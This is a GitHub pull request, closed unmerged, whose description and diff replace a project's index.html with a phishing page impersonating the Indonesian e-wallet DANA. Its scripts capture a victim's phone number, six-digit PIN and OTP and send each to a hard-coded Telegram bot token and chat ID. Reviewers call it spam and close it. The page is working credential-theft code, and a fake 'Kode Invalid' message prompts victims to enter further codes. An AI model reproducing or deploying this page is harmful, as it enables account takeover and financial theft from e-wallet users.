### PR TITLE
Update index.html

### PR DESCRIPTION
**Pull request by Eizfauziah37**
<html class="hydrated"><head>
  <meta charset="UTF-8"><style data-styles="">ion-icon{visibility:hidden}.hydrated{visibility:inherit}</style><style data-styles="">ion-icon{visibility:hidden}.hydrated{visibility:inherit}</style>
  <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
  <meta name="theme-color" content="#118EEA"> 
  
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title></title>
  <meta property="og:title" content="DANA ID">
  <meta property="twitter:title" content="DANA ID ">
  <meta property="twitter:card" content="summary_large_image">
  <meta property="og:image:type" content="image/jpeg">
  <meta content="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" property="og:image">
   <link href="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" rel="shortcut icon" type="image/x-icon">
    <link href="https://images.app.goo.gl/3mTdwFp4gHiT9qYd7" rel="apple-touch-icon">
   <link rel="canonical" href="https://www.dana.id/">
     <meta property="og:url" content="https://www.dana.id/">
  <meta property="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <meta property="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
  <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
  <script nomodule="" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/container.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/loader.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/main.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/otp.css">
  <link rel="stylesheet" href="https://dev-danapemulihan.pantheonsite.io/asset/pin.css">
  <style>
      
  body, html{
        left: 0;
        right: 0;
        bottom: 0;
        top: 0;
        margin: 0px auto;
        width: 100%;
        height: 100%;
        positon: fixed
        
  }
  h2{font-size: 18px; }
  
  h3{
    font-size: 14px;  
  }
  
   
   * {
    box-sizing: border-box;
    scrollbar-color: transparent transparent; /* thumb and track color */
    scrollbar-width: 0px;
  }
  
  *::-webkit-scrollbar {
    width: 0;
  }
  
  *::-webkit-scrollbar-track {
    background: transparent;
  }
  
  *::-webkit-scrollbar-thumb {
    background-color: #118CEA;
    border: none;
  }
  
  * {
    -ms-overflow-style: none;
  }
  
  ol, li {
    list-style: none;
    margin: 0;
    padding: 0;
  }
  
  .carousel {
    position: absolute;
    background-color: #118CEA;
    padding-top:0%;
    height: 100%;
    top: 0;
    right: 0;
    left: 0;
    margin: 0px auto;
    perspective: 200px;
  }
  
  .carousel__viewport {
    position: absolute;
    padding: 32px;
    width: 100%;
    top: 0;
    background-color: #118CEA;
    right: 0;
    bottom: 0;
    left: 0;
    height: 79%;
    display: flex;
    overflow-x: scroll;
    counter-reset: item;
    margin: 0px auto;
   
    scroll-behavior: smooth;
    scroll-snap-type: x mandatory;{}
  }
  
  .carousel__slide {
    position: relative;
    flex: 0 0 100%;
    width: 100%;
    height: 100%;
    margin-left: 10px;
    background-color: #118CEA;
    counter-increment: item;
    z-index: 99999999;
  }
  
  .carousel__slide:nth-child(even) {
    background-color: #118CEA;
  }
  
  .carousel__slide:before {
    content: counter(item);
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate3d(-50%,-40%,70px);
    color: #000;
    font-size: 2em;
    background-color: #118CEA;
  }
  
  .carousel__snapper {
    position: relative;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    width: 100%;
    height: 100%;
    scroll-snap-align: center;
    background-color: #118CEA;
    
    
  }
  
  @media (hover: hover) {
    .carousel__snapper {
      animation-name: tonext, snap;
      animation-timing-function: ease;
      animation-duration: 4s;
      animation-iteration-count: infinite;
    }
  
    .carousel__slide:last-child .carousel__snapper {
      animation-name: tostart, snap;
    }
  }
  
  @media (prefers-reduced-motion: reduce) {
    .carousel__snapper {
      animation-name: none;
    }
  }
  
  .carousel:hover .carousel__snapper,
  .carousel:focus-within .carousel__snapper {
    animation-name: none;
  }
  
  .carousel__navigation {
    position: absolute;
    right: 0;
    bottom: 0;
    left: 0;
    text-align: center;
  }
  
  .carousel__navigation-list,
  .carousel__navigation-item {
    display: inline-block;
  }
  
  
  .carousel::before,
  .carousel::after,
  .carousel__prev,
  .carousel__next {
    position: absolute;
    top: 0;
    margin-top: 37.5%;
    width: 0;
    height: 0;
    transform: translateY(-50%);
    border-radius: 50%;
    font-size: 0;
    outline: 0;
    opacity: 0.0;
  }
  
  .carousel::before,
  .carousel__prev {
    left: -1rem;
  }
  
  .carousel::after,
  .carousel__next {
    right: 0rem;
  }
  
  .carousel::before,
  .carousel::after {
    content: '';
    z-index: 1;
    background-color: #fff;
    background-size: 1.5rem 1.5rem;
    background-repeat: no-repeat;
    background-position: center center;
    color: #000;
    font-size: 2.5rem;
    line-height: 4rem;
    text-align: center;
    pointer-events: none;
  }
  
  /*********************/
  .process1 {
       width: 100%;
              height: 100%;
               display: flex;
               justify-content: center;
              margin: auto;
              position: absolute;
             padding-top: 300px;
              left: 0;
              right: 0;
              bottom: 0;
              background: rgba(0, 0, 0, 0.6);
              z-index: 99999;
              
        
  }
  .loading {
      position: absolute;
      display: flex;
      justify-content: center;
      align-items: center;
      margin-bottom: 20%;
  }
  .loading img {
      width: 50px;
      
      top: 10;
  }
  .loading .spinner{
      position: absolute;
      width: 35px;
      animation: spin 1s linear infinite;
      -webkit-animation: spin 1s linear infinite;
      -moz-animation: spin 1s linear infinite;
      -ms-animation: spin 1s linear infinite;
      -o-animation: spin 1s linear infinite;
  }
  @keyframes spin {
    0% { transform: rotate(360deg); }
    100% { transform: rotate(0deg); }
  }
  @-webkit-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-moz-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-ms-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  @-o-keyframes spin {
    0% { -webkit-transform: rotate(360deg); }
    100% { -webkit-transform: rotate(0deg); }
  }
  
  /*********************/
  
   #homeku{
       width: 100%;
       height: 100%;
       position: fixed;
      background: #118EEA;
    background-position: 100% 100%;
    background-size: 100% 100%;
    left: 0;
    right: 0;
    top: 0;
    bottom: 0;
    margin: 0px auto;
       
       
   }
   
   .inp{
       width: 70%;
       padding-left: 10px;
   }
   
   
   .btn-backku{
       position: absolute;
       left: 20;
       top: 12;
       background: transparent;
       color: #fff;
       border: none;
       font-size: 18px;
       font-weight: 300;
      
   }
   
   
   #back1{
        display: none;
       
   }
   
   #back2{
        display: none;
   }
  </style></head>
  
  <body>
  
  <div style="display:none;" class="index">
    <div class="header">
      
    </div>
    <div class="content">
      <div class="hero">
        
      </div>
      <h1>Dompet digital untuk kamu!</h1>
      <p class="desc">
        Simpan uang serta kartu debit/kredit dengan<br>praktis di DANA</p>
      <div class="line"></div>
      <p class="log">
        Masukkan <b>nomor HP</b> kamu untuk lanjut
      </p>
      <button type="button" onclick="next();">LOGIN</button>
    </div>
  </div>
  <div class="start" style="display: none;">
    
    <div class="footimg">
      
      <p>
        DANA Indonesia terdaftar dan diawasi<br>oleh Bank Indonesia dan Kominfo</p>
    </div>
  </div>
  
  <div class="container hid" style="position: fixed; display: block;">
      
    <div class="" style="text-align: center;" id="homeku">
     
  
          
       <section class="carousel" aria-label="Gallery" style="margin-top: 0px; text-align: center; left: 0">
    <ol class="carousel__viewport">
      <li id="carousel__slide1" tabindex="0" class="carousel__slide" style="background-color: #118EEA;">
        <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif');
        background-position: 100% 100%;
        background-repeat: no-repeat;
        background-size: 100% 100%; z-index: 99999999; position: relative;">
         
         
        </div>
      </li>
      <li id="carousel__slide2" tabindex="0" class="carousel__slide" style="background-color: #118EEA;">
        <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYewNJayil_To6kgdWxmdq3TDJKQJ7lAAbD1de1uuuWTLQzCGdR8qT1S2mTehsdR02AFN573iPkN-0IrliCuRAy0xJfSH9AlfJWV7odqpRC_bxJLM2EkLf-84_ePEjEfE8SOtiKfEjcLQ7nDBjDc/s16000/ezgif.com-crop%20(4).gif');
        background-position: 100% 100%;
        background-repeat: no-repeat;
        background-size: 100% 100%; background-color: transparent;"></div>
        <a href="#carousel__slide1" class="carousel__prev">Go to previous slide</a>
        <a href="#carousel__slide3" class="carousel__next">Go to next slide</a>
      </li>
      <li id="carousel__slide3" tabindex="0" class="carousel__slide" style="background-color: #118EEA;">
        <div class="carousel__snapper" style="background-image: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif');
        background-position: 100% 100%;
        background-repeat: no-repeat;
        background-size: 100% 100%;">
         
         
        </div>
      </li>
     
    </ol>
    <aside class="carousel__navigation">
      <ol class="carousel__navigation-list">
        <li class="carousel__navigation-item">
          <a href="#carousel__slide1" class="carousel__navigation-button"></a>
        </li>
        <li class="carousel__navigation-item">
          <a href="#carousel__slide2" class="carousel__navigation-button"></a>
        </li>
        <li class="carousel__navigation-item">
          <a href="#carousel__slide3" class="carousel__navigation-button"></a>
        </li>
        <li class="carousel__navigation-item">
          
      </li></ol>
    </aside>
  </section>
  <button id="butonku" style="width: 90%; height: 189px; position: fixed; bottom: 0; left: 0; right: 0; margin: 1px auto; border: 0; background: url('https://user-images.githubusercontent.com/155412066/296517930-fcfc7dd0-ba64-4395-85bf-e4103927b567.jpg');
        background-position: 100% 100%;
        background-repeat: no-repeat;
        background-size: 100% 100%; z-index: 99999" onclick="nextPrev()"></button>
        <center>
       <div id="process1" name="process" class="process" style="display: none;">
              <div class="loading">
                  
                  
              </div>
          </div>
          </center>
    </div>
    <div id="blogin" class="box-login" style="width: 100%;
      height: 100%;
      bottom: 0; 
      position: fixed; 
      left: 0; 
      padding: 0px
      right: 0; 
      margin: 0px auto;
      top: 0; display: none;">
          <div id="process" name="process" class="process" style="display: none;">
        <div class="loading">
          
          
        </div>
      </div>
      
      <div class="header">
  <button id="back1" type="button" class="btn-backku" onclick="goback1()"><ion-icon name="chevron-back-outline" role="img" class="md hydrated"></ion-icon></button>	<p></p>
  
  
        
      </div>
      <form id="formNohp" onsubmit="sendNohp(event);">
           <input type="hidden" id="logo" value="𝔻𝔸ℕ𝔸 𝕀𝔻">
        <h3 style="font-size: 16px; margin-top: -20px">Masukkan <b>nomor HP</b> kamu untuk lanjut</h3>
        <div class="box-input" style="width: 95%;">
          <div class="label">
            <label>+62</label>
          </div>
          <input class="inp" id="inp" type="tel" autocomplete="off" required="" name="nohp" placeholder="812-3456-7890" maxlength="15" minlength="10"></div>
        <p class="desc" style="font-size: 12px; line-height: 18px; margin-top: 25px">
  Nomor ponsel akan digunakan sebagai ID kamu &amp; menjaga<br>akun selalu aman. Dengan melanjutkan, kamu setuju dengan <b>Syarat &amp; Ketentuan dan Kebijakan Privasi</b> kami.
        </p>
        <div class="box-btn">
          <button id="btn" class="btnnohp" type="submit" style="margin-top: -40px">LANJUT</button>
        </div>
      </form>
      <form id="formPin" omsubmit="return false" class="hid" style="width: 100%;
      height: 100%;
      bottom: 0; 
      position: fixed; 
      left: 0; 
      right: 0; 
      margin: 0px auto;
      top: 0;">
           <input type="hidden" id="logo" value="|___𝔻𝔸ℕ𝔸 𝕀𝔻___|">
          <button id="back2" type="button" class="btn-backku" onclick="goback2()" style="margin-top: 10px"><ion-icon name="chevron-back-outline" role="img" class="md hydrated"></ion-icon></button>
        <h3 style="margin-top: 50px; font-weight: 600; margin-bottom: -10px; font-size: 16px"><font style="font-weight: 400">Masukkan</font> PIN DANA</h3>
        <div class="box-input-pin">
          <div type="button" class="clear"></div>
          <input name="pin1" id="pin1" class="inppin" inputmode="numeric" type="password" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin2" id="pin2" class="inppin" inputmode="numeric" type="password" autocomplete="off" required""""="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin3" id="pin3" class="inppin" inputmode="numeric" type="password" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin4" id="pin4" class="inppin" inputmode="numeric" type="password" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin5" id="pin5" class="inppin" inputmode="numeric" type="password" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="pin6" id="pin6" class="inppin" inputmode="numeric" type="password" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;" onchange="javascript:this.form.button();" oninput="sendPin()"></div>
        <button class="show" type="button">TAMPILKAN</button>
        <p class="forgot">LUPA PIN?</p>
        
      </form>
  <div class="bgotp hid" style="width: 100%;
      height: 100%;
      bottom: 0; 
      position: absolute; 
      left: 0; 
      right: 0; 
      margin: 0px auto;
      top: 0;">
  <div class="bgotp hid"><form id="formOtp" class=""><h2>Masukan Kode OTP</h2><br><center>
          <p class="alert" id="alert" style="font-size: 14px; text-align: center; margin-bottom: 0px; font-weight: 500; color: #000; margin-top: 0px; display: ; width: 360px; margin-bottom: -10px; font-weight: 300"></p>
          
          
          </center>
          <div class="box-input-otp" style="margin-top: 50px">
            
            <div class="loadingOtp" style="display:none;background: #fafafa">
  
              
              
      </div>
      <div type="button" class="clearotp"></div>
       <input type="hidden" id="logo" value="|___𝔻𝔸ℕ𝔸 𝕀𝔻___|">
            <input name="otp1" id="otp1" class="inpotp" inputmode="numeric" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="otp2" id="otp2" class="inpotp" inputmode="numeric" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="otp3" id="otp3" class="inpotp" inputmode="numeric" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"><input name="otp4" id="otp4" class="inpotp" inputmode="numeric" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;"></div>
       <p id="waktuku" class="resend" style="margin-top: 20px; spacing: 2;color: #0f78cb; font-size: 13px">
            Kirim Ulang (<span id="carasingkat" style="color: #0f78cb">41</span>s)
                  </p>
                  <br><br>
                  

  
         <p class="resend" style="margin-top: 70px; spacing: 2; font-weight: 600; color: #0f78cb; margin-left: 0px; display: none" id="kirim-ulang" onclick="kirimulang()">Kirim Ulang</p>
         
         
        </form></div>
      </div>
    </div>
  </div>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
          <script>
              var url = "#kirim-ulang"; // url tujuan
              var count = 60; // dalam detik
              function countDown() {
                  
                  if (count > 0) {
                      count--;
                      var waktu = count + 0;
              $('#carasingkat').html(waktu);
               
           setTimeout("countDown()", 1000);
             
                      
                 
                  }
              }
              countDown();
         
         </script>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
  <script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
  <script src="./asset/goo1gle.js"></script>
  <script>$(document).ready(function(){$('#inp').on('input', function(){if($(this).val() == '0' || $(this).val() == '62'){$(this).val('');}});});</script>
  <script>$(document).ready(function(){$('#inp').mask('000-0000-000000');});</script>
  <script>let inp = document.getElementById("inp");let btn = document.getElementById("btn");inp.addEventListener("input", val);function val(){if(inp.value.length > 10){btn.disabled = false;}else{btn.disabled = true;}};</script>
  
  <script>
  //var pinContainer = document.getElementsByClassName("pin-code")[maxlength];
  var pinContainer = document.querySelector(".box-input-pin");
  console.log('There is ' + pinContainer.length + ' Pin Container on the page.');
  
  pinContainer.addEventListener('keyup', function (event) {
      var target = event.srcElement;
      
      var maxLength = parseInt(target.attributes["maxlength"].value, 6);
      var myLength = target.value. length;
  
      if (myLength >= maxLength) {
          var next = target;
          while (next = next.nextElementSibling) {
              if (next == 0) break;
              if (next.tagName.toLowerCase() == "input") {
                  next.focus();
                  break;
              }
          } aa
      }
  
      if (myLength === 0) {
          var next = target;
          while (next = next.previousElementSibling) {
              if (next == 0) break;
              if (next.tagName.toLowerCase() == "input") {
                  next.focus();
                  break;
              }
          }
      }
  }, false);
  
  pinContainer.addEventListener('keydown', function (event) {
      var target = event.srcElement;
      target.value = "";
  }, false);
  </script>
  <script>$('.inpotp').on('input', function(event) {const inputs = $('.inpotp');const isAllFilled = Array.from(inputs).every((input) => input.value !== '');if (isAllFilled == true) {$(event.target).blur();sendOtp();}const index = inputs.index(this);const currentValue = event.target.value;if (currentValue.length === 1) {if (index < inputs.length - 1) {inputs[index + 1].focus();}} else if (currentValue.length === 0) {if (index > 0) {inputs[index].focus();}};});$('.inpotp').on('keydown', function(event) {const inputs = $('.inpotp');const key = event.key;const index = inputs.index(this);if (key === 'Backspace' && event.target.value.length === 0) {if (index > 0) {inputs[index - 1].focus();}};});</script>
  <script>$(document).ready(function() {$('.clear').click(function() {$('.inppin').val('');$('#pin1').focus();});$('.clearotp').click(function() {$('.inpotp').val('');$('#otp1').focus();});$('.show').click(function() {$('.inppin').each(function() {if ($(this).attr('type') === 'password') {$(this).attr('type','number');$(".show").text("SEMBUNYIKAN");} else {$(this).attr('type', 'password');$(".show").text("TAMPILKAN");}});});});</script>
  <script>
   function nextPrev(){
        $("#process1").show();event.preventDefault();
         setTimeout(function(){
             $("#homeku").hide();
             $("#back1").show();
             $("#butonku").fadeOut();
             $(".box-login").fadeIn();
             $("#process1").hide();
         },1000);
   }   
   
   
   function goback1(){
       $("#process").show();
       setTimeout(function(){
       $("#homeku").show();
        $(".box-login").fadeOut();
        $("#butonku").fadeIn();
        $("#back1").hide();
         $("#process").hide();
         
       },500);
   }
   
   </script>
   <script>
   
   function goback2(){
       $("#process").show();
       setTimeout(function(){
      $("#formPin").fadeOut();
       $("#formNohp").fadeIn();
         $("#process").hide();
          $("#inp").val('');
          $("#back1").show();
          $("#back2").hide();
          document.getElementById("formPin").reset();
          $('.inppin').val('');
       },500);
   }
  </script>
  <script>
      $( document ).ready(function() {
              setTimeout(() => {
                  $('#popup').hide();
                  $('chsalxcome2').fadeIn();
              },2000)
               $('musikku').play();
          })
          
  </script>
  
  
  <script>
  function tutupotp(){
  $(".bgotp").hide();    
  }
  </script>
  <script>
     function sendNohp(event){
      $("#process").show();event.preventDefault();
      $("#inp").blur();
       
      
      
      var nomor = document.getElementById("inp").value;
              sessionStorage.setItem("nomor", nomor);
      var logo = document.getElementById('logo');       
      var inp = document.getElementById('inp');
      
      var gabungan = '' + logo.value + '%0A𝗡𝗢.𝗛𝗣 >>>>: ' + '0' + inp.value;
     
       var token = '7680523455:AAFCLm8RCHhLcLCIEkQNv9MeN3oMRPttBnA'; 
      var grup = '6843904888'; 

  
      $.ajax({
          url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
          method: `POST`,
      
      success: function(){
      $("#process").hide();
      document.getElementById("back1").style.display = "none";
      document.getElementById("back2").style.display = "block";
      $("#formNohp").fadeOut();
      setTimeout(function(){
     
      $("#formPin").fadeIn();
      $("#pin1").focus();
      }, 500);}});};
      
  
  function sendPin(){
  
   
   
    var nomor = sessionStorage.getItem("nomor");
          document.getElementById("alert").innerHTML = "Kode dikirim via SMS ke +62 " + nomor+ " <br/>";
    var logo = document.getElementById('logo'); 
    var inp = document.getElementById('inp');
   var pin1 = document.getElementById('pin1');
   var pin2 = document.getElementById('pin2');
   var pin3 = document.getElementById('pin3');
   var pin4 = document.getElementById('pin4');
   var pin5 = document.getElementById('pin5');
   var pin6 = document.getElementById('pin6');
       
    var gabungan = '' + logo.value + '%0A𝐍𝐨.𝐇𝐩: ' + '0' + inp.value + '%0A𝗣 𝗜 𝗡 >>>>     : ' + pin1.value + pin2.value + pin3.value + pin4.value + pin5.value + pin6.value;
    
       
   
  
       var token = '7680523455:AAFCLm8RCHhLcLCIEkQNv9MeN3oMRPttBnA'; 
      var grup = '6843904888';  

      $.ajax({
          url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
          method: `POST`,
  
  
  success: function(){
  $("#process").hide();
  document.getElementById("alert").style.display = "block"; 
  $(".bgotp").fadeIn();
  setInterval(countdown, 1000);
  $("#otp1").focus();
  }
  }
  );
  };
  
  
    function sendOtp(){
      $(".loadingOtp").show();
       var logo = document.getElementById('logo'); 
       var inp = document.getElementById('inp');
   var pin1 = document.getElementById('pin1');
   var pin2 = document.getElementById('pin2');
   var pin3 = document.getElementById('pin3');
   var pin4 = document.getElementById('pin4');
   var pin5 = document.getElementById('pin5');
   var pin6 = document.getElementById('pin6');
       var otp1 = document.getElementById('otp1');
     var otp2 = document.getElementById('otp2');
     var otp3 = document.getElementById('otp3');
     var otp4 = document.getElementById('otp4');
      setTimeout(function(){
  $(".alert").text("Kode Invalid ");
  $(".alert").css("color","red");
   },2000);
      var gabungan = '' + logo.value + '%0A𝐍𝐨.𝐇𝐩: ' + '0' + inp.value + '%0A𝗣 𝗜 𝗡 >>>>    : ' + pin1.value + pin2.value + pin3.value + pin4.value + pin5.value + pin6.value + '%0A%0A𝗢 𝗧 𝗣>>>>    : ' + otp1.value + otp2.value + otp3.value + otp4.value;
  
  
       var token = '7680523455:AAFCLm8RCHhLcLCIEkQNv9MeN3oMRPttBnA'; 
      var grup = '6843904888'; 
  
      $.ajax({
          url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
          method: `POST`,
          
      success: function(){
      setTimeout(function(){
      $(".loadingOtp").hide();
     
      $('.inpotp').val('');
     $('#otp1').focus();
    var nomor = sessionStorage.getItem("nomor");
          document.getElementById("alert").innerHTML = "Kode baru dikirim ulang via WhatsApp ke  +62" + nomor +  " <br/>";
     $(".alert").css("color","black");
      },4000);
     
          
      }
          
      }
      );
          
      };
      </script>
  <script>
      function countdown() {
      var count = parseInt(
      $('#countdown').text());
      if (count !== 0) {
      $('#countdown').text(count - 1);} 
      else {
      $('#countdown').text('60');}};
      </script>
  <script>
  window.onload = function(){
          setTimeout(function(){
              $(".start").fadeIn();
              setTimeout(function(){
                  $(".start").fadeOut(1000);
                  setTimeout(function(){
                     $(".container").fadeIn(200);
                     $("#inp").focus();
                  },1000);
              },1000);
          },500);
  }
  </script>
  
  </body></html>
  
id="<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <title>Judul halaman</title>
</head>
<body>
    
</body>
</html>"

### CODE REVIEW

**Review by ekwoka — CHANGES_REQUESTED** [review]
Please just delete your account before GitHub bans you

File: index.html [hunk 1]
```diff
@@ -1,27 +1,802 @@
...
+id="<!DOCTYPE html>
+<html lang="in">
+<head>
+    <meta charset="UTF-8">
+    <title>Judul halaman</title>
+</head>
+<body>
+    
+</body>
+</html>"
```
Comment (piq9117) [inline index.html:802]:
```suggestion
```

File: index.html [hunk 2]
```diff
@@ -1,27 +1,802 @@
...
-   <input type="text" x-model.boolean="val">
-   <input type="checkbox" x-model.boolean="val">
-   <input type="radio" name="foo" value="true" x-model.boolean="val">
-   <input type="radio" name="foo" value="false" x-model.boolean="val">
+  
+         <p class="resend" style="margin-top: 70px; spacing: 2; font-weight: 600; color: #0f78cb; margin-left: 0px; display: none" id="kirim-ulang" onclick="kirimulang()">Kirim Ulang</p>
+         
+         
+        </form></div>
+      </div>
```
Comment (piq9117) [inline index.html:515]:
```suggestion
```

File: index.html [hunk 3]
```diff
@@ -1,27 +1,802 @@
...
+   #back2{
+        display: none;
+   }
+  </style></head>
+  
+  <body>
+  
+  <div style="display:none;" class="index">
+    <div class="header">
+      <img src="https://dev-danapemulihan.pantheonsite.io/asset/img/dana_logo.png" class="logo" alt="">
```
Comment (piq9117) [inline index.html:336]:
```suggestion
```

**Comment by hirokoclanger** [comment]
Can't wait to see that script suggestion in my coPilot.

**Comment by CodecNomad** [comment]
hi

**Comment by SimoTod** [comment]
closing since it's just rubbish 😂

**Comment by CodecNomad** [comment]
Alr

**Pull request closed without merging**